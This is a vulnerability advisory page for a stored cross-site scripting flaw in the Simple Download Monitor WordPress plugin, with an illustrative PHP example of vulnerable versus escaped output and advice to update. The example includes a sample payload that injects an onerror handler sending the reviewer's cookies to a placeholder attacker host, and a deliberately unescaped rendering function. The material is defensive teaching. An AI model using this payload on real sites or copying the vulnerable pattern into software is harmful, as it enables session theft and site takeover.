Vulnerability Description
The Simple Download Monitor WordPress plugin before 3.9.5 does not escape the "File Thumbnail" post meta before outputting it in some pages, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks. Because the XSS is triggered even while the Download is still in a review (pending) state, a Contributor could make JavaScript execute in the context of a reviewer such as an administrator and have them create a rogue admin account or install a malicious plugin.
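The pattern behind this bug class, as an added illustration in reduced form: this is not Simple Download Monitor's own code, and it makes no claim about which template or file the advisory refers to. A Contributor-controlled post-meta value is dropped straight into an `<img>` tag in the vulnerable function; the hardened function escapes for the attribute's URL context and additionally sanitizes on save. The meta key `sdm_example_thumbnail`, the `sdm_example_*` function names, the markup and the sample payload are all assumptions made for the example.

```php
<?php
/**
 * Added example of the stored-XSS pattern described in CVE-2021-24693.
 * NOT Simple Download Monitor's code: the meta key, function names and
 * markup are assumptions for illustration. Runs inside WordPress, where
 * esc_url(), esc_attr(), esc_url_raw() etc. are defined.
 */

// Constructed sample input: what a Contributor could type into a
// "File Thumbnail" field. It closes the src="..." attribute and adds an
// event handler that fires when the reviewer's browser fails to load the image.
const SDM_EXAMPLE_PAYLOAD = 'https://example.invalid/missing.png" onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)';

/** Vulnerable pattern: the stored meta goes into HTML without escaping. */
function sdm_example_render_vulnerable( string $thumb ): string {
    return '<img src="' . $thumb . '" alt="Download thumbnail">';
}

/**
 * Hardened pattern: escape for the exact output context.
 * esc_url() strips characters that cannot appear in a URL (including " < >),
 * percent-encodes spaces, and returns '' for schemes outside
 * wp_allowed_protocols(), so a javascript: URL is dropped as well.
 * esc_attr() is the right call for any non-URL attribute value.
 */
function sdm_example_render_safe( string $thumb ): string {
    $url = esc_url( $thumb );
    if ( '' === $url ) {
        return ''; // nothing safe to render
    }
    return '<img src="' . $url . '" alt="' . esc_attr( 'Download thumbnail' ) . '">';
}

/**
 * Defence in depth: sanitize on save too, so the stored value is already a
 * plain URL. Output escaping above is still required; the save-time filter
 * only limits what reaches the database. Hook this on save_post in a plugin
 * (nonce verification omitted here for brevity; add it in real code).
 */
function sdm_example_save_thumbnail( int $post_id ): void {
    if ( ! isset( $_POST['sdm_example_thumbnail'] ) ) {
        return;
    }
    // Contributors legitimately edit their own posts, so a capability check
    // cannot replace escaping; it only confirms the request is well-formed.
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        return;
    }
    $clean = esc_url_raw( wp_unslash( $_POST['sdm_example_thumbnail'] ) );
    update_post_meta( $post_id, 'sdm_example_thumbnail', $clean );
}

// Typical call sites inside the loop ($post->ID from WordPress):
// $thumb = get_post_meta( $post->ID, 'sdm_example_thumbnail', true );
// echo sdm_example_render_vulnerable( $thumb ); // reviewer's browser runs the payload
// echo sdm_example_render_safe( $thumb );       // src stays one quoted URL
```

With the sample payload, the vulnerable function emits a second `onerror` attribute, so simply opening the pending Download in the admin preview runs attacker JavaScript with the reviewer's session. The hardened function removes the double quotes and angle brackets and keeps everything inside the `src` attribute, so the worst outcome is a broken image. The practical check for a site owner is the plugin version: anything below 3.9.5 is affected, and the fix is to update.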
CVSS Score
CRITICAL (CVSS base score 9.0)
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Tipsandtricks-Hq | Simple Download Monitor | < 3.9.5 |
Related Weaknesses (CWE)
References
- https://wpscan.com/vulnerability/4bb559b7-8dde-4c90-a9a6-d8dcfbea53a7 (Exploit, Third Party Advisory)
FAQ
What is CVE-2021-24693?
CVE-2021-24693 is a vulnerability with a CVSS score of 9.0 (CRITICAL). The Simple Download Monitor WordPress plugin before 3.9.5 does not escape the "File Thumbnail" post meta before outputting it in some pages, which could allow users with a role as low as Contributor t...
How severe is CVE-2021-24693?
CVE-2021-24693 has been rated CRITICAL with a CVSS base score of 9.0/10. This is considered a critical vulnerability requiring immediate attention.
Is there a patch for CVE-2021-24693?
Yes. Versions of Simple Download Monitor before 3.9.5 are affected; updating to 3.9.5 or later addresses the issue. See the references section above for the advisory. Affected products include: Tipsandtricks-Hq Simple Download Monitor.